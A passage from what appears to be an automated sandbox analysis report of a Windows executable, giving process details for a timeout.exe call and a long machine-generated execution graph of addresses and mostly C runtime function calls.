                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:137
                                                                                                                                                                                                Start time:04:47:35
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:timeout /t 10 /nobreak
                                                                                                                                                                                                Imagebase:0x7ff6c9000000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:7.6%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:7.9%
                                                                                                                                                                                                  Total number of Nodes:1256
                                                                                                                                                                                                  Total number of Limit Nodes:58
                                                                                                                                                                                                  execution_graph 21344 7ff745004850 21346 7ff745004861 21344->21346 21345 7ff7450048a4 21346->21345 21351 7ff74501a28c 21346->21351 21348 7ff745004882 21348->21345 21349 7ff745005d40 35 API calls 21348->21349 21350 7ff74500489b 21349->21350 21352 7ff74501a2ba 21351->21352 21354 7ff74501a332 21352->21354 21355 7ff74501a2df 21352->21355 21353 7ff74501af40 _invalid_parameter_noinfo_noreturn 35 API calls 21357 7ff74501a308 21353->21357 21358 7ff74501a164 21354->21358 21355->21353 21357->21348 21365 7ff745019ca8 EnterCriticalSection 21358->21365 21378 7ff74501d474 21381 7ff74501d240 21378->21381 21388 7ff74501b23c EnterCriticalSection 21381->21388 17881 7ff74501385c 17902 7ff745013d68 17881->17902 17884 7ff7450139a8 17886 7ff7450143fc 7 API calls 17884->17886 17885 7ff745013878 __scrt_acquire_startup_lock 17887 7ff7450139b2 17885->17887 17889 7ff745013896 __scrt_release_startup_lock 17885->17889 17886->17887 17888 7ff7450143fc 7 API calls 17887->17888 17891 7ff7450139bd BuildCatchObjectHelperInternal 17888->17891 17890 7ff7450138bb 17889->17890 17892 7ff745013941 17889->17892 17947 7ff74501cf68 17889->17947 17908 7ff745014544 17892->17908 17894 7ff745013946 17911 7ff7450043d0 17894->17911 17899 7ff745013969 17899->17891 17954 7ff745013eec 17899->17954 17903 7ff745013d70 17902->17903 17904 7ff745013d7c __scrt_dllmain_crt_thread_attach 17903->17904 17905 7ff745013870 17904->17905 17906 7ff745013d89 17904->17906 17905->17884 17905->17885 17906->17905 17958 7ff7450158e0 17906->17958 17985 7ff74502c750 17908->17985 17910 7ff74501455b GetStartupInfoW 17910->17894 17912 7ff7450043fe 17911->17912 17987 7ff745007f80 17912->17987 17914 7ff745004413 17915 7ff745007f80 37 API calls 17914->17915 17916 7ff745004427 17915->17916 17917 7ff745007f80 37 API calls 17916->17917 17918 7ff74500443b 17917->17918 18001 7ff745004170 17918->18001 17921 7ff745004170 142 API calls 17922 7ff745004468 17921->17922 17923 7ff745004170 142 API calls 17922->17923 17924 7ff74500447e 17923->17924 18019 7ff745009560 17924->18019 17928 7ff74500450f numpunct 17929 7ff745009560 37 API calls 17928->17929 17945 7ff7450047b8 17928->17945 17931 7ff7450045da 17929->17931 17930 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 17932 7ff7450047be 17930->17932 17933 7ff745003fc0 40 API calls 17931->17933 17934 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 17932->17934 17935 7ff7450045e4 numpunct 17933->17935 17936 7ff7450047c4 17934->17936 17935->17932 17935->17936 17939 7ff7450047b3 17935->17939 17943 7ff74500478f numpunct 17935->17943 17937 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 17936->17937 17938 7ff7450047ca 17937->17938 18042 7ff745008110 17938->18042 18037 7ff74501b018 17939->18037 17944 7ff7450136e0 std::_Xinvalid_argument 8 API calls 17943->17944 17946 7ff7450047a2 17944->17946 17945->17930 17952 7ff745014588 GetModuleHandleW 17946->17952 17948 7ff74501cf9e 17947->17948 17949 7ff74501cf7f 17947->17949 18742 7ff74501efe0 17948->18742 17949->17892 17953 7ff745014599 17952->17953 17953->17899 17956 7ff745013efd 17954->17956 17955 7ff745013980 17955->17890 17956->17955 17957 7ff7450158e0 7 API calls 17956->17957 17957->17955 17959 7ff7450158e8 17958->17959 17960 7ff7450158f2 17958->17960 17964 7ff745015ab8 17959->17964 17960->17905 17965 7ff745015ac7 17964->17965 17966 7ff7450158ed 17964->17966 17972 7ff745018ed4 17965->17972 17968 7ff745018d04 17966->17968 17969 7ff745018d2f 17968->17969 17970 7ff745018d12 DeleteCriticalSection 17969->17970 17971 7ff745018d33 17969->17971 17970->17969 17971->17960 17976 7ff745018d3c 17972->17976 17978 7ff745018d80 __vcrt_FlsAlloc 17976->17978 17983 7ff745018e26 TlsFree 17976->17983 17977 7ff745018dae LoadLibraryExW 17980 7ff745018e4d 17977->17980 17981 7ff745018dcf GetLastError 17977->17981 17978->17977 17979 7ff745018e6d GetProcAddress 17978->17979 17978->17983 17984 7ff745018df1 LoadLibraryExW 17978->17984 17979->17983 17980->17979 17982 7ff745018e64 FreeLibrary 17980->17982 17981->17978 17982->17979 17984->17978 17984->17980 17986 7ff74502c740 17985->17986 17986->17910 17986->17986 17992 7ff745007fb0 17987->17992 17988 7ff7450080fb 18076 7ff745001210 17988->18076 17991 7ff7450080f5 18070 7ff745001170 17991->18070 17992->17988 17992->17991 17994 7ff745008057 ctype 17992->17994 17995 7ff74500808e 17992->17995 17996 7ff745008039 17992->17996 17994->17914 17997 7ff745013708 std::_Facet_Register 37 API calls 17995->17997 17996->17991 18061 7ff745013708 17996->18061 17997->17994 18000 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 18000->17991 18002 7ff7450041b3 __scrt_get_show_window_mode 18001->18002 18109 7ff745005f40 18002->18109 18004 7ff7450041ca 18005 7ff74500424d 18004->18005 18137 7ff745005680 18004->18137 18159 7ff7450053b0 18005->18159 18008 7ff74500420b 18153 7ff745005e40 18008->18153 18009 7ff745004278 18012 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18009->18012 18014 7ff7450042c1 18012->18014 18013 7ff7450042d4 18163 7ff745001e70 18013->18163 18014->17921 18016 7ff745004316 18017 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18016->18017 18018 7ff745004327 18017->18018 18020 7ff7450095ce 18019->18020 18023 7ff745009635 __scrt_get_show_window_mode 18020->18023 18708 7ff745008250 18020->18708 18022 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18024 7ff745004506 18022->18024 18023->18022 18025 7ff745003fc0 18024->18025 18026 7ff74500403c 18025->18026 18027 7ff745009560 37 API calls 18026->18027 18028 7ff7450040a1 CreateProcessW 18027->18028 18029 7ff7450040ed CloseHandle CloseHandle 18028->18029 18032 7ff7450040e9 18028->18032 18029->18032 18030 7ff74500413a numpunct 18031 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18030->18031 18033 7ff74500414e 18031->18033 18032->18030 18034 7ff74500415f 18032->18034 18033->17928 18035 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 18034->18035 18036 7ff745004164 18035->18036 18038 7ff74501aea4 _invalid_parameter_noinfo_noreturn 35 API calls 18037->18038 18039 7ff74501b031 18038->18039 18040 7ff74501b048 _invalid_parameter_noinfo_noreturn 17 API calls 18039->18040 18041 7ff74501b046 18040->18041 18043 7ff7450126ac std::_Lockit::_Lockit 39 API calls 18042->18043 18044 7ff745008140 18043->18044 18045 7ff7450126ac std::_Lockit::_Lockit 39 API calls 18044->18045 18049 7ff74500818f 18044->18049 18046 7ff745008165 18045->18046 18050 7ff745012724 std::_Lockit::~_Lockit LeaveCriticalSection 18046->18050 18047 7ff7450081dc 18048 7ff745012724 std::_Lockit::~_Lockit LeaveCriticalSection 18047->18048 18051 7ff745008220 18048->18051 18049->18047 18722 7ff745008910 18049->18722 18050->18049 18052 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18051->18052 18053 7ff7450047e1 18052->18053 18056 7ff745008243 18058 7ff7450018b0 Concurrency::cancel_current_task 37 API calls 18056->18058 18057 7ff7450081f4 18059 7ff745012aac std::_Facet_Register 37 API calls 18057->18059 18060 7ff745008248 18058->18060 18059->18047 18064 7ff745013713 18061->18064 18062 7ff74500804e 18062->17994 18062->18000 18063 7ff74501c370 std::_Facet_Register 2 API calls 18063->18064 18064->18062 18064->18063 18065 7ff745013732 18064->18065 18066 7ff74501373d 18065->18066 18079 7ff7450128bc 18065->18079 18068 7ff745001170 Concurrency::cancel_current_task 37 API calls 18066->18068 18069 7ff745013743 18068->18069 18071 7ff74500117e Concurrency::cancel_current_task 18070->18071 18072 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18071->18072 18073 7ff74500118f 18072->18073 18088 7ff74501538c 18073->18088 18075 7ff7450011b9 18075->17988 18101 7ff7450128dc 18076->18101 18080 7ff7450128ca std::bad_alloc::bad_alloc 18079->18080 18083 7ff7450155d0 18080->18083 18082 7ff7450128db 18084 7ff7450155ef 18083->18084 18085 7ff745015618 RtlPcToFileHeader 18084->18085 18086 7ff74501563a RaiseException 18084->18086 18087 7ff745015630 18085->18087 18086->18082 18087->18086 18089 7ff7450153e2 18088->18089 18090 7ff7450153ad 18088->18090 18089->18075 18090->18089 18092 7ff74501f000 18090->18092 18093 7ff74501f00d 18092->18093 18095 7ff74501f017 18092->18095 18093->18095 18099 7ff74501f032 18093->18099 18094 7ff74501b1d0 _set_fmode 13 API calls 18096 7ff74501f01e 18094->18096 18095->18094 18097 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18096->18097 18098 7ff74501f02a 18097->18098 18098->18089 18099->18098 18100 7ff74501b1d0 _set_fmode 13 API calls 18099->18100 18100->18096 18106 7ff7450127b4 18101->18106 18104 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18105 7ff7450128fe 18104->18105 18107 7ff74501538c __std_exception_copy 35 API calls 18106->18107 18108 7ff7450127e8 18107->18108 18108->18104 18110 7ff745013708 std::_Facet_Register 37 API calls 18109->18110 18111 7ff74500603f 18110->18111 18174 7ff745012aec 18111->18174 18116 7ff74500608e 18118 7ff745013708 std::_Facet_Register 37 API calls 18116->18118 18117 7ff74500624f 18124 7ff745001e70 37 API calls 18117->18124 18119 7ff74500610e 18118->18119 18120 7ff745012aec 43 API calls 18119->18120 18121 7ff74500611e 18120->18121 18203 7ff745012eb0 18121->18203 18125 7ff74500628f 18124->18125 18127 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18125->18127 18126 7ff74500619e 18211 7ff745005d40 18126->18211 18130 7ff74500621e 18127->18130 18132 7ff745001e70 37 API calls 18130->18132 18135 7ff7450061cd 18130->18135 18131 7ff745008110 72 API calls 18131->18135 18133 7ff7450062e4 18132->18133 18134 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18133->18134 18136 7ff7450062f5 18134->18136 18135->18004 18138 7ff7450056c5 18137->18138 18141 7ff7450056da 18138->18141 18606 7ff7450063f0 18138->18606 18139 7ff745005710 18142 7ff745005781 18139->18142 18145 7ff7450057c4 18139->18145 18141->18139 18602 7ff745004aa0 18141->18602 18622 7ff745012948 __uncaught_exceptions 18142->18622 18144 7ff745005786 18147 7ff745005792 18144->18147 18626 7ff745006550 18144->18626 18148 7ff745001e70 37 API calls 18145->18148 18147->18008 18149 7ff745005806 18148->18149 18150 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18149->18150 18151 7ff745005817 18150->18151 18151->18008 18154 7ff745005e5a 18153->18154 18158 7ff745004215 18153->18158 18665 7ff745005c50 18154->18665 18156 7ff745005e94 18157 7ff7450198e0 65 API calls 18156->18157 18157->18158 18158->18005 18158->18013 18160 7ff7450053cd 18159->18160 18161 7ff745005e40 70 API calls 18160->18161 18162 7ff74500540a 18160->18162 18161->18162 18162->18009 18164 7ff745001ea0 18163->18164 18164->18164 18675 7ff7450084f0 18164->18675 18166 7ff745001eb4 18689 7ff7450014d0 18166->18689 18168 7ff745001f02 numpunct 18168->18016 18169 7ff745001ecd 18169->18168 18170 7ff74501b018 _invalid_parameter_noinfo_noreturn 35 API calls 18169->18170 18171 7ff745001f24 18170->18171 18172 7ff74501538c __std_exception_copy 35 API calls 18171->18172 18173 7ff745001f5d 18172->18173 18173->18016 18217 7ff7450126ac 18174->18217 18176 7ff745012b0e 18182 7ff745012b31 ctype 18176->18182 18225 7ff745012ce4 18176->18225 18179 7ff745012b26 18228 7ff745012d14 18179->18228 18180 7ff74500604f 18183 7ff745006620 18180->18183 18221 7ff745012724 18182->18221 18184 7ff74500665f 18183->18184 18185 7ff7450126ac std::_Lockit::_Lockit 39 API calls 18184->18185 18186 7ff74500666c 18185->18186 18187 7ff7450126ac std::_Lockit::_Lockit 39 API calls 18186->18187 18191 7ff7450066bb 18186->18191 18188 7ff745006691 18187->18188 18192 7ff745012724 std::_Lockit::~_Lockit LeaveCriticalSection 18188->18192 18189 7ff745006705 18190 7ff745012724 std::_Lockit::~_Lockit LeaveCriticalSection 18189->18190 18197 7ff74500674f 18190->18197 18191->18189 18276 7ff745001b60 18191->18276 18192->18191 18195 7ff7450067a4 18307 7ff7450018b0 18195->18307 18196 7ff745006723 18304 7ff745012aac 18196->18304 18200 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18197->18200 18202 7ff745006070 18200->18202 18202->18116 18202->18117 18204 7ff745012ef6 18203->18204 18210 7ff745006195 18204->18210 18341 7ff74501b6e0 18204->18341 18208 7ff745012f44 18208->18210 18364 7ff7450198e0 18208->18364 18210->18126 18210->18130 18212 7ff745005dda 18211->18212 18213 7ff745005dba 18211->18213 18215 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18212->18215 18596 7ff745019c60 18213->18596 18216 7ff745005e24 18215->18216 18216->18131 18218 7ff7450126bb 18217->18218 18220 7ff7450126c0 18217->18220 18232 7ff74501b2ac 18218->18232 18220->18176 18222 7ff74501272f LeaveCriticalSection 18221->18222 18224 7ff745012738 18221->18224 18224->18180 18226 7ff745013708 std::_Facet_Register 37 API calls 18225->18226 18227 7ff745012cf6 18226->18227 18227->18179 18229 7ff745012d39 18228->18229 18230 7ff745012d26 18228->18230 18229->18182 18271 7ff745013390 18230->18271 18235 7ff745021f6c 18232->18235 18236 7ff745021f98 18235->18236 18237 7ff745021f7c 18235->18237 18259 7ff7450218ec 18236->18259 18238 7ff745021924 __crtLCMapStringW 37 API calls 18237->18238 18238->18236 18240 7ff745021f9d 18241 7ff745021fc6 18240->18241 18242 7ff745021924 __crtLCMapStringW 37 API calls 18240->18242 18243 7ff745021924 __crtLCMapStringW 37 API calls 18241->18243 18245 7ff745021fef 18241->18245 18242->18241 18243->18245 18244 7ff745022018 18247 7ff745022041 18244->18247 18248 7ff745021924 __crtLCMapStringW 37 API calls 18244->18248 18245->18244 18246 7ff745021924 __crtLCMapStringW 37 API calls 18245->18246 18246->18244 18249 7ff74502206a 18247->18249 18250 7ff745021924 __crtLCMapStringW 37 API calls 18247->18250 18248->18247 18251 7ff745022093 18249->18251 18252 7ff745021924 __crtLCMapStringW 37 API calls 18249->18252 18250->18249 18253 7ff7450220bc 18251->18253 18254 7ff745021924 __crtLCMapStringW 37 API calls 18251->18254 18252->18251 18255 7ff7450220e5 18253->18255 18256 7ff745021924 __crtLCMapStringW 37 API calls 18253->18256 18254->18253 18257 7ff74501b2b5 EnterCriticalSection 18255->18257 18258 7ff745021924 __crtLCMapStringW 37 API calls 18255->18258 18256->18255 18258->18257 18260 7ff7450218f9 18259->18260 18262 7ff7450218fc 18259->18262 18260->18240 18261 7ff745021901 18261->18240 18262->18261 18270 7ff74501b23c EnterCriticalSection 18262->18270 18264 7ff745021a22 VirtualProtect 18265 7ff745021ad0 18264->18265 18266 7ff74501c108 BuildCatchObjectHelperInternal 36 API calls 18265->18266 18268 7ff745021ad5 18266->18268 18267 7ff745021b15 18267->18240 18268->18267 18269 7ff745021924 __crtLCMapStringW 37 API calls 18268->18269 18269->18267 18272 7ff74501339e EncodePointer 18271->18272 18273 7ff7450133c5 18271->18273 18272->18229 18274 7ff74501c108 BuildCatchObjectHelperInternal 36 API calls 18273->18274 18275 7ff7450133ca 18274->18275 18277 7ff745001cc0 18276->18277 18278 7ff745001b8c 18276->18278 18277->18195 18277->18196 18278->18277 18279 7ff745013708 std::_Facet_Register 37 API calls 18278->18279 18280 7ff745001b9f 18279->18280 18281 7ff7450126ac std::_Lockit::_Lockit 39 API calls 18280->18281 18282 7ff745001bd0 18281->18282 18283 7ff745001cde 18282->18283 18284 7ff745001c0c 18282->18284 18318 7ff745012924 18283->18318 18313 7ff745012c5c 18284->18313 18305 7ff745013708 std::_Facet_Register 37 API calls 18304->18305 18306 7ff745012abf 18305->18306 18306->18189 18308 7ff7450018be Concurrency::cancel_current_task 18307->18308 18309 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18308->18309 18310 7ff7450018cf 18309->18310 18311 7ff74501538c __std_exception_copy 35 API calls 18310->18311 18312 7ff7450018f9 18311->18312 18323 7ff74501b5c8 18313->18323 18315 7ff745012c9e 18316 7ff745012c75 _Yarn 18316->18315 18317 7ff74501b5c8 std::_Locinfo::_Locinfo_ctor 68 API calls 18316->18317 18317->18315 18336 7ff745001230 18318->18336 18321 7ff7450155d0 Concurrency::cancel_current_task 2 API calls 18322 7ff745012946 18321->18322 18324 7ff745021f6c std::_Locinfo::_Locinfo_ctor 38 API calls 18323->18324 18325 7ff74501b5de 18324->18325 18328 7ff74501b2e8 18325->18328 18335 7ff74501b23c EnterCriticalSection 18328->18335 18330 7ff74501b304 18331 7ff74501b328 std::_Locinfo::_Locinfo_ctor 68 API calls 18330->18331 18332 7ff74501b30d 18331->18332 18333 7ff74501b290 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 18332->18333 18334 7ff74501b317 18333->18334 18334->18316 18337 7ff74501538c __std_exception_copy 35 API calls 18336->18337 18338 7ff745001273 18337->18338 18339 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18338->18339 18340 7ff74500128d 18339->18340 18340->18321 18342 7ff74501b614 18341->18342 18343 7ff74501b63a 18342->18343 18346 7ff74501b66d 18342->18346 18344 7ff74501b1d0 _set_fmode 13 API calls 18343->18344 18345 7ff74501b63f 18344->18345 18349 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18345->18349 18347 7ff74501b680 18346->18347 18348 7ff74501b673 18346->18348 18368 7ff74502156c 18347->18368 18350 7ff74501b1d0 _set_fmode 13 API calls 18348->18350 18352 7ff745012f29 18349->18352 18350->18352 18352->18210 18360 7ff74501abd8 18352->18360 18354 7ff74501b6a1 18375 7ff7450244b0 18354->18375 18355 7ff74501b694 18356 7ff74501b1d0 _set_fmode 13 API calls 18355->18356 18356->18352 18358 7ff74501b6b4 18380 7ff745019cb4 LeaveCriticalSection 18358->18380 18361 7ff74501ac08 18360->18361 18573 7ff74501a8bc 18361->18573 18363 7ff74501ac24 18363->18208 18365 7ff745019910 18364->18365 18585 7ff7450197bc 18365->18585 18367 7ff745019929 18367->18210 18381 7ff74501b23c EnterCriticalSection 18368->18381 18370 7ff745021583 18371 7ff7450215e0 15 API calls 18370->18371 18372 7ff74502158e 18371->18372 18373 7ff74501b290 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 18372->18373 18374 7ff74501b68a 18373->18374 18374->18354 18374->18355 18382 7ff7450241ac 18375->18382 18378 7ff745024508 18378->18358 18383 7ff7450241e7 __vcrt_FlsAlloc 18382->18383 18392 7ff7450243ae 18383->18392 18397 7ff74502a434 18383->18397 18384 7ff74501b1d0 _set_fmode 13 API calls 18385 7ff745024485 18384->18385 18386 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18385->18386 18387 7ff7450243b7 18386->18387 18387->18378 18394 7ff74502b000 18387->18394 18389 7ff745024419 18390 7ff74502a434 39 API calls 18389->18390 18389->18392 18391 7ff745024438 18390->18391 18391->18392 18393 7ff74502a434 39 API calls 18391->18393 18392->18384 18392->18387 18393->18392 18414 7ff74502a5d0 18394->18414 18398 7ff74502a465 18397->18398 18399 7ff74502a441 18397->18399 18401 7ff74502a4a7 18398->18401 18404 7ff74502a4c6 18398->18404 18399->18398 18400 7ff74502a446 18399->18400 18402 7ff74501b1d0 _set_fmode 13 API calls 18400->18402 18403 7ff74501b1d0 _set_fmode 13 API calls 18401->18403 18405 7ff74502a44b 18402->18405 18407 7ff74502a4ac 18403->18407 18408 7ff74501bfe8 TranslateName 36 API calls 18404->18408 18411 7ff74502a4b7 __crtLCMapStringW 18404->18411 18406 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18405->18406 18409 7ff74502a456 18406->18409 18410 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18407->18410 18413 7ff74502a4df 18408->18413 18409->18389 18410->18411 18411->18389 18412 7ff74502b1ec 39 API calls TranslateName 18412->18413 18413->18411 18413->18412 18415 7ff74502a5e7 18414->18415 18416 7ff74502a605 18414->18416 18417 7ff74501b1d0 _set_fmode 13 API calls 18415->18417 18416->18415 18418 7ff74502a621 18416->18418 18419 7ff74502a5ec 18417->18419 18425 7ff74502abec 18418->18425 18421 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18419->18421 18423 7ff74502a5f8 18421->18423 18423->18378 18470 7ff74502a914 18425->18470 18428 7ff74502ac77 18489 7ff745027318 18428->18489 18429 7ff74502ac5f 18501 7ff74501b1ac 18429->18501 18432 7ff74502ac64 18438 7ff74501b1d0 _set_fmode 13 API calls 18432->18438 18434 7ff74502ac9c CreateFileW 18436 7ff74502ad1a 18434->18436 18437 7ff74502ada2 18434->18437 18435 7ff74502ac83 18439 7ff74501b1ac _fread_nolock 13 API calls 18435->18439 18440 7ff74502ad6f GetLastError 18436->18440 18444 7ff74502ad35 CreateFileW 18436->18444 18442 7ff74502ada5 GetFileType 18437->18442 18441 7ff74502a64c 18438->18441 18443 7ff74502ac88 18439->18443 18504 7ff74501b160 18440->18504 18441->18423 18469 7ff7450272f0 LeaveCriticalSection 18441->18469 18446 7ff74502adb2 GetLastError 18442->18446 18447 7ff74502ae03 18442->18447 18448 7ff74501b1d0 _set_fmode 13 API calls 18443->18448 18444->18440 18444->18442 18449 7ff74501b160 _fread_nolock 13 API calls 18446->18449 18509 7ff745027230 18447->18509 18448->18432 18450 7ff74502adc1 CloseHandle 18449->18450 18450->18432 18452 7ff74502adf3 18450->18452 18454 7ff74501b1d0 _set_fmode 13 API calls 18452->18454 18456 7ff74502adf8 18454->18456 18455 7ff74502ae79 18461 7ff74502ae80 18455->18461 18537 7ff74502a694 18455->18537 18456->18432 18460 7ff74502aec8 18460->18441 18463 7ff74502af48 CloseHandle CreateFileW 18460->18463 18533 7ff745021404 18461->18533 18464 7ff74502af8f GetLastError 18463->18464 18468 7ff74502afbd 18463->18468 18465 7ff74501b160 _fread_nolock 13 API calls 18464->18465 18466 7ff74502af9c 18465->18466 18564 7ff745027458 18466->18564 18468->18441 18471 7ff74502a94e 18470->18471 18478 7ff74502a968 18470->18478 18472 7ff74501b1d0 _set_fmode 13 API calls 18471->18472 18471->18478 18473 7ff74502a95d 18472->18473 18474 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18473->18474 18474->18478 18475 7ff74502aa31 18477 7ff74501cfb0 35 API calls 18475->18477 18487 7ff74502aa93 18475->18487 18476 7ff74502a9e0 18476->18475 18479 7ff74501b1d0 _set_fmode 13 API calls 18476->18479 18480 7ff74502aa8f 18477->18480 18478->18476 18481 7ff74501b1d0 _set_fmode 13 API calls 18478->18481 18482 7ff74502aa26 18479->18482 18485 7ff74501b048 _invalid_parameter_noinfo_noreturn 17 API calls 18480->18485 18480->18487 18483 7ff74502a9d5 18481->18483 18484 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18482->18484 18486 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18483->18486 18484->18475 18488 7ff74502ab26 18485->18488 18486->18476 18487->18428 18487->18429 18490 7ff74501b23c std::_Locinfo::_Locinfo_ctor EnterCriticalSection 18489->18490 18496 7ff74502733b 18490->18496 18491 7ff745027364 18493 7ff745027068 14 API calls 18491->18493 18492 7ff74501b290 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 18494 7ff745027439 18492->18494 18495 7ff745027369 18493->18495 18494->18434 18494->18435 18498 7ff745027208 _fread_nolock EnterCriticalSection 18495->18498 18500 7ff745027387 18495->18500 18496->18491 18497 7ff7450273ba EnterCriticalSection 18496->18497 18496->18500 18499 7ff7450273c9 LeaveCriticalSection 18497->18499 18497->18500 18498->18500 18499->18496 18500->18492 18502 7ff74501ffe0 _set_fmode 13 API calls 18501->18502 18503 7ff74501b1b5 18502->18503 18503->18432 18505 7ff74501b1ac _fread_nolock 13 API calls 18504->18505 18506 7ff74501b16d __free_lconv_mon 18505->18506 18507 7ff74501b1d0 _set_fmode 13 API calls 18506->18507 18508 7ff74501b17d 18507->18508 18508->18432 18510 7ff7450272be 18509->18510 18511 7ff745027253 18509->18511 18512 7ff74501b1d0 _set_fmode 13 API calls 18510->18512 18511->18510 18517 7ff74502727f 18511->18517 18513 7ff7450272c3 18512->18513 18514 7ff74501b1ac _fread_nolock 13 API calls 18513->18514 18515 7ff7450272b1 18514->18515 18515->18455 18518 7ff74502ab28 18515->18518 18516 7ff7450272a8 SetStdHandle 18516->18515 18517->18515 18517->18516 18519 7ff74502ab8f 18518->18519 18520 7ff74502ab5f 18518->18520 18519->18455 18520->18519 18521 7ff7450237d4 _fread_nolock 37 API calls 18520->18521 18522 7ff74502ab74 18521->18522 18523 7ff74502ab7d 18522->18523 18524 7ff74502ab93 18522->18524 18525 7ff74501b1ac _fread_nolock 13 API calls 18523->18525 18526 7ff745023100 _fread_nolock 47 API calls 18524->18526 18527 7ff74502ab82 18525->18527 18528 7ff74502abaa 18526->18528 18527->18519 18531 7ff74501b1d0 _set_fmode 13 API calls 18527->18531 18529 7ff74502abc0 18528->18529 18532 7ff74502b9b8 62 API calls 18528->18532 18529->18527 18530 7ff7450237d4 _fread_nolock 37 API calls 18529->18530 18530->18527 18531->18519 18532->18529 18534 7ff745021434 18533->18534 18535 7ff74502149c 38 API calls 18534->18535 18536 7ff74502144d 18535->18536 18536->18441 18538 7ff74502a6e5 18537->18538 18539 7ff74502a80d 18537->18539 18540 7ff74501cfb0 35 API calls 18538->18540 18546 7ff74502a704 18538->18546 18539->18460 18539->18461 18541 7ff74502a6fc 18540->18541 18542 7ff74502a8ff 18541->18542 18541->18546 18543 7ff74501b048 _invalid_parameter_noinfo_noreturn 17 API calls 18542->18543 18544 7ff74502a913 18543->18544 18545 7ff74502a802 18545->18539 18547 7ff745023100 _fread_nolock 47 API calls 18545->18547 18548 7ff74502a808 18545->18548 18546->18539 18546->18545 18549 7ff74502a7b6 18546->18549 18550 7ff7450237d4 _fread_nolock 37 API calls 18546->18550 18554 7ff74502a834 18547->18554 18548->18539 18553 7ff74501b1d0 _set_fmode 13 API calls 18548->18553 18549->18539 18549->18548 18551 7ff745020d84 60 API calls 18549->18551 18552 7ff74502a7f0 18550->18552 18551->18549 18552->18549 18558 7ff74502a7f5 18552->18558 18553->18539 18554->18539 18554->18548 18555 7ff74502a896 18554->18555 18556 7ff74502a870 18554->18556 18557 7ff74502a863 18554->18557 18562 7ff7450237d4 _fread_nolock 37 API calls 18555->18562 18556->18555 18561 7ff74502a879 18556->18561 18559 7ff74501b1d0 _set_fmode 13 API calls 18557->18559 18560 7ff7450237d4 _fread_nolock 37 API calls 18558->18560 18559->18548 18560->18545 18563 7ff7450237d4 _fread_nolock 37 API calls 18561->18563 18562->18548 18563->18548 18565 7ff745027474 18564->18565 18566 7ff7450274e6 18564->18566 18565->18566 18572 7ff7450274a7 18565->18572 18567 7ff74501b1d0 _set_fmode 13 API calls 18566->18567 18568 7ff7450274eb 18567->18568 18569 7ff74501b1ac _fread_nolock 13 API calls 18568->18569 18570 7ff7450274d8 18569->18570 18570->18468 18571 7ff7450274d0 SetStdHandle 18571->18570 18572->18570 18572->18571 18574 7ff74501a926 18573->18574 18575 7ff74501a8e6 18573->18575 18574->18575 18577 7ff74501a932 18574->18577 18576 7ff74501af40 _invalid_parameter_noinfo_noreturn 35 API calls 18575->18576 18580 7ff74501a90d 18576->18580 18584 7ff745019ca8 EnterCriticalSection 18577->18584 18580->18363 18586 7ff7450197d7 18585->18586 18587 7ff745019805 18585->18587 18588 7ff74501af40 _invalid_parameter_noinfo_noreturn 35 API calls 18586->18588 18589 7ff7450197f7 18587->18589 18595 7ff745019ca8 EnterCriticalSection 18587->18595 18588->18589 18589->18367 18591 7ff74501981c 18592 7ff745019838 63 API calls 18591->18592 18593 7ff745019828 18592->18593 18594 7ff745019cb4 _fread_nolock LeaveCriticalSection 18593->18594 18594->18589 18597 7ff745019c69 18596->18597 18601 7ff745019c79 18596->18601 18598 7ff74501b1d0 _set_fmode 13 API calls 18597->18598 18599 7ff745019c6e 18598->18599 18600 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 18599->18600 18600->18601 18601->18212 18603 7ff745004b43 ctype 18602->18603 18605 7ff745004ac8 ctype 18602->18605 18603->18605 18633 7ff74501a064 18603->18633 18605->18139 18607 7ff7450064b0 18606->18607 18608 7ff74500642e 18606->18608 18610 7ff7450136e0 std::_Xinvalid_argument 8 API calls 18607->18610 18652 7ff745005af0 18608->18652 18612 7ff7450064de 18610->18612 18612->18141 18613 